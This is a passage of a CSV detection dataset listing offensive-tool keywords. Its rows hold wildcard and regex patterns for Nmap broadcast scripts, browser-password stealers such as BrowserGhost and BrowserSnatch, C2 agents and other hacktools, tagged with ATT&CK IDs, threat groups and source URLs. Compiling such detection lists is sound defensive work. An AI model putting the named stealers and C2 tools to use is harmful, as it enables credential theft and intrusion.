T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 
T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","N/A","10","10","27","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z","5779" "*/broadcast-ataoe-discover.nse*",".{0,1000}\/broadcast\-ataoe\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5780" "*/broadcast-avahi-dos.nse*",".{0,1000}\/broadcast\-avahi\-dos\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5781" "*/broadcast-bjnp-discover.nse*",".{0,1000}\/broadcast\-bjnp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5782" "*/broadcast-db2-discover.nse*",".{0,1000}\/broadcast\-db2\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5783" "*/broadcast-dhcp6-discover.nse*",".{0,1000}\/broadcast\-dhcp6\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5784" "*/broadcast-dhcp-discover.nse*",".{0,1000}\/broadcast\-dhcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5785" "*/broadcast-dns-service-discovery.nse*",".{0,1000}\/broadcast\-dns\-service\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5786" "*/broadcast-dropbox-listener.nse*",".{0,1000}\/broadcast\-dropbox\-listener\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5787" "*/broadcast-eigrp-discovery.nse*",".{0,1000}\/broadcast\-eigrp\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5788" "*/broadcast-hid-discoveryd.nse*",".{0,1000}\/broadcast\-hid\-discoveryd\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5789" "*/broadcast-igmp-discovery.nse*",".{0,1000}\/broadcast\-igmp\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5790" "*/broadcast-jenkins-discover.nse*",".{0,1000}\/broadcast\-jenkins\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5791" "*/broadcast-listener.nse*",".{0,1000}\/broadcast\-listener\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5792" "*/broadcast-ms-sql-discover.nse*",".{0,1000}\/broadcast\-ms\-sql\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5793" "*/broadcast-netbios-master-browser.nse*",".{0,1000}\/broadcast\-netbios\-master\-browser\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5794" "*/broadcast-networker-discover.nse*",".{0,1000}\/broadcast\-networker\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5795" "*/broadcast-novell-locate.nse*",".{0,1000}\/broadcast\-novell\-locate\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5796" "*/broadcast-ospf2-discover.nse*",".{0,1000}\/broadcast\-ospf2\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5797" "*/broadcast-pc-anywhere.nse*",".{0,1000}\/broadcast\-pc\-anywhere\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5798" "*/broadcast-pc-duo.nse*",".{0,1000}\/broadcast\-pc\-duo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5799" "*/broadcast-pim-discovery.nse*",".{0,1000}\/broadcast\-pim\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5800" "*/broadcast-ping.nse*",".{0,1000}\/broadcast\-ping\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5801" "*/broadcast-pppoe-discover.nse*",".{0,1000}\/broadcast\-pppoe\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5802" "*/broadcast-rip-discover.nse*",".{0,1000}\/broadcast\-rip\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5803" "*/broadcast-ripng-discover.nse*",".{0,1000}\/broadcast\-ripng\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5804" "*/broadcast-sonicwall-discover.nse*",".{0,1000}\/broadcast\-sonicwall\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5805" "*/broadcast-sybase-asa-discover.nse*",".{0,1000}\/broadcast\-sybase\-asa\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5806" "*/broadcast-tellstick-discover.nse*",".{0,1000}\/broadcast\-tellstick\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5807" "*/broadcast-upnp-info.nse*",".{0,1000}\/broadcast\-upnp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5808" "*/broadcast-versant-locate.nse*",".{0,1000}\/broadcast\-versant\-locate\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5809" "*/broadcast-wake-on-lan.nse*",".{0,1000}\/broadcast\-wake\-on\-lan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5810" "*/broadcast-wpad-discover.nse*",".{0,1000}\/broadcast\-wpad\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5811" "*/broadcast-wsdd-discover.nse*",".{0,1000}\/broadcast\-wsdd\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5812" "*/broadcast-xdmcp-discover.nse*",".{0,1000}\/broadcast\-xdmcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5813" "*/Bropper.git*",".{0,1000}\/Bropper\.git.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Hakumarachi/Bropper","1","1","N/A","N/A","7","3","201","19","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z","5814" "*/bropper.py*",".{0,1000}\/bropper\.py.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Hakumarachi/Bropper","1","1","N/A","N/A","7","3","201","19","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z","5815" "*/Browser-C2*",".{0,1000}\/Browser\-C2.{0,1000}","offensive_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105 - T1102","TA0003 - TA0005 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","N/A","10","10","102","28","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z","5816" "*/BrowserDataGrabber.git*",".{0,1000}\/BrowserDataGrabber\.git.{0,1000}","offensive_tool_keyword","Browser Data Grabber","credential access tool used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://github.com/n37sn4k3/BrowserDataGrabber","1","1","N/A","N/A","10","1","7","4","2018-05-28T15:49:03Z","2018-05-04T12:33:32Z","5817" 
"*/BrowserGhost.exe*",".{0,1000}\/BrowserGhost\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","5818" "*/BrowserGhost.git*",".{0,1000}\/BrowserGhost\.git.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","1","N/A","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","5819" "*/BrowserGhost/releases/download/*",".{0,1000}\/BrowserGhost\/releases\/download\/.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","1","N/A","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","5820" "*/BrowserGhost/tarball/*",".{0,1000}\/BrowserGhost\/tarball\/.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","1","N/A","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","5821" 
"*/BrowserGhost/zipball/*",".{0,1000}\/BrowserGhost\/zipball\/.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","1","N/A","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","5822" "*/browserhistory.csv*",".{0,1000}\/browserhistory\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","5823" "*/BrowserSnatch.git*",".{0,1000}\/BrowserSnatch\.git.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","1","N/A","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","5824" "*/BrowserSnatch/releases/download*",".{0,1000}\/BrowserSnatch\/releases\/download.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. 
A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","1","N/A","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","5825" "*/BrowserSnatch-master*",".{0,1000}\/BrowserSnatch\-master.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","1","N/A","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","5826" "*/BrtoVenomRenames.sh*",".{0,1000}\/BrtoVenomRenames\.sh.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","5827" "*/brute force.cna*",".{0,1000}\/brute\sforce\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 